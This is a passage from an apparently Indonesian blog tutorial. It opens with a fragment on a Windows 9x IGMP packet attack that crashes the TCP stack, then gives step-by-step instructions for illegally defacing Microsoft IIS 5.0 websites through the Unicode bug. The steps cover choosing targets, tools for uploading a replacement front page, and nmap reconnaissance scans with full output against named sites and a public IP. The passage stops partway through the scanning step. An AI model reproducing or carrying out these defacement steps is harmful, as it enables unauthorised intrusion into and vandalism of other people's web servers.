kemungkinan berhasilnya fifty-fifty karena packet serangan kita terkadang difilter oleh
server.
3. Komputer target memiliki server yang memiliki firewall dan client menjalankan
Windows9x/NT/ME disini ada kemungkinan berhasil sangat kecil sekali karena sangat
banyak kemungkinannya diantaranya adalah client menggunakan WinNT dan sudah di
patch atau diberi security maka sangat susah sekali ditembus kedua Windows9x ada
kemungkinan berhasil jika firewall di server tidak memblokir port 139 tadi.
Kod sebenarnya disebabkan oleh Proses dari proses igmp packet untuk Window tidak
tertulis secara benar. Kod membuat Blue Screen pada Windows 98/98 SE dan membunuh
TCP stack. Ketika pengguna komputer menggunakan komputer yang telah diserang oleh
kod ini dia tetap bisa melakukan aktivitasnya tetapi tidak ada lagi TCP stack. Packet yang
ditulis oleh user akan dikirimkan tetapi tidak akan menerima jawaban. Contoh untuk situasi
seperti ini adalah jika Anda melakukan perintah ping terhadap suatu address maka icmp
echo request akan di kirimkan tetapi icmp echo replies tidak akan mengirimkan jawaban
kembali. Solusi untuk para pengguna komputer yang menggunakan modem sebagai alat
koneksi ke internet adalah memutuskan hubungan internet dan menyambungkan/connect
kembali. Dan untuk pengguna komputer yang posisi jaringan komputernya adalah melalui
LAN maka komputer tersebut harus direstart.
Mengubah Tampilan Web (Defacing) Secara Illegal pada server Windows
Pada bagian ini kita akan berbagi pengalaman bagaimana cara melakukan defacing web
server yang menggunakan Microsoft Internet Information Server atau lebih kita kenal
dengan nama Microsoft IIS
Pada Microsoft Internet Information Server Atau Microsoft IIS 5.0 memiliki suatu bug yang
dinamakan “UnicodeBug”. Bug tersebut dapat mengexplorasi komputer / situs hanya
melalui web browser saja.
Sebelum melakukan defacing, perlu kita persiapkan beberapa hal sebagai berikut:
1. Menentukan target atau sasaran untuk defacing.
2. Web/internet browser yang kita gunakan untuk mengakses situs tujuan. Misalnya:
FireFox, Netscape Navigator dan lain - lain.
3. Mencari server yang menggunakan Microsoft IIS. Anda bisa melakukan pemeriksaan,
apakah server tujuan menggunakan sistem operasi Windows atau bukan di situs
http://www.netcraft.com
Selain hal diatas yang perlu kita perhatikan adalah, kita harus memastikan situs yang akan
kita ubah tampilannya (deface),menjalankan Microsoft IIS yang masih belum di patch pada
Unicodenya
Sekarang kita memasuki tahap untuk melakukan deface. Sebelumnya ada beberapa tool
yang sangat mendukung dalam usaha defacing kita. Sebenarnya ada bermacam-macam
tool yang biasa digunakan tetapi untuk saat ini kami akan memberikan beberapa tool saja
yang sekiranya sudah cukup untuk proses deface. Tool-tool tersebut diantaranya adalah :
1. tftpd32.exe Tool ini digunakan untuk melakukan Upload index.html atau halaman depan
yang telah kita siapkan yang nantinya akan kita taruh dihalaman depan situs tersebut.
2. ncx99.exe Tool ini digunakan untuk mengambil file index.html atau halaman depan dari
situs yang telah berhasil kita deface
3. Unitools.tgz Tool ini digunakan untuk untuk melakukan tes, apakah situs sasaran bisa
atau tidak untuk defacing. Program ini hanya berjalan di Linux/Unix
Adapun langkah-langkah dalam melakukan defacing web adalah sebagai berikut:
1. Pastikan server situs sasaran menggunakan sistem operasi MS Windows dan
menjalankan Microsoft IIS 5.0. Untuk mengentahuinya, Anda bisa cari di
http://www.netcraft.com.
Berikut ini adalah contoh situs yang menggunakan sistem operasi Windows 2003 Server
# Selanjutnya, kita pastikan sasaran kita, dengan melakukan pemindaian sasaran. Tujuan
dari pemindaian ini adalah, kita bisa emngetahui celah-celah yang terbuka dan
memungkinkan bagi kita untuk melakukan serangan. Pemindaian ini kita lakukan dengan
menggunakan program nmap. Contohnya adalah sebagai berikut:
[root@dir:~] # nmap -P0 -sT -v -O www.nama_sasaran.com
Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2006-02-18 03:55 GMT
Initiating Connect() Scan against www.nama_sasaran.com (192.168.0. [1668
ports] at 03:55
Discovered open port 80/tcp on 192.168.0.8
Connect() Scan Timing: About 45.92% done; ETC: 03:56 (0:00:35 remaining)
The Connect() Scan took 77.65s to scan 1668 total ports.
Warning: OS detection will be MUCH less reliable because we did not find at
least 1 open and 1 closed TCP port
For OSScan assuming port 80 is open, 33786 is closed, and neither are firewalled
Host www.gramedia.com (192.168.0. appears to be up … good.
Interesting ports on www.gramedia.com (192.168.0.8):
(The 1667 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
80/tcp open http
Device type: general purpose
Running: IBM AIX 4.X, Microsoft Windows 2003/.NET|NT/2K/XP
OS details: IBM AIX 4.3.2.0-4.3.3.0 on an IBM RS/*, Microsoft Windows 2003
Server or XP SP2, Microsoft Windows XP Home Edition (English) SP2, Microsoft
Windows XP Pro SP2, Microsoft Windows XP SP2
TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!)
IPID Sequence Generation: Incremental
Nmap finished: 1 IP address (1 host up) scanned in 81.771 seconds
Raw packets sent: 21 (1796B) | Rcvd: 7 (420B)
[root@dir:~] #
Contoh di atas adalah salah satu target sasaran yang cukup tangguh sistem keamanannya.
Berikut ini, kita akan lakukan pemindaian sekali lagi dengan sasaran yang agak lemah.
Seperti ditunjukkan pada contoh berikut ini:
[root@dir:~] # nmap -P0 -sT -v -O www.sasaran2.com
Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2006-02-18 04:04 GMT
Initiating Connect() Scan against 64.62.165.135 [1668 ports] at 04:04
Discovered open port 3389/tcp on 64.62.165.135
Discovered open port 443/tcp on 64.62.165.135
Discovered open port 25/tcp on 64.62.165.135
Discovered open port 80/tcp on 64.62.165.135
Discovered open port 21/tcp on 64.62.165.135
Discovered open port 1248/tcp on 64.62.165.135
Discovered open port 1025/tcp on 64.62.165.135
Connect() Scan Timing: About 48.89% done; ETC: 04:05 (0:00:31 remaining)
Discovered open port 1026/tcp on 64.62.165.135
Increasing send delay for 64.62.165.135 from 0 to 5 due to max_successful_tryno
increase to 4
Discovered open port 2067/tcp on 64.62.165.135
The Connect() Scan took 88.85s to scan 1668 total ports.
For OSScan assuming port 21 is open, 1 is closed, and neither are firewalled
Host 64.62.165.135 appears to be up … good.
Interesting ports on 64.62.165.135:
(The 1637 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http
130/tcp filtered cisco-fna
131/tcp filtered cisco-tna
132/tcp filtered cisco-sys
133/tcp filtered statsrv
134/tcp filtered ingres-net
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
140/tcp filtered emfis-data
#
200/tcp filtered src
443/tcp open https
444/tcp filtered snpp
bersambung nanti lagi yaaa
Read More......
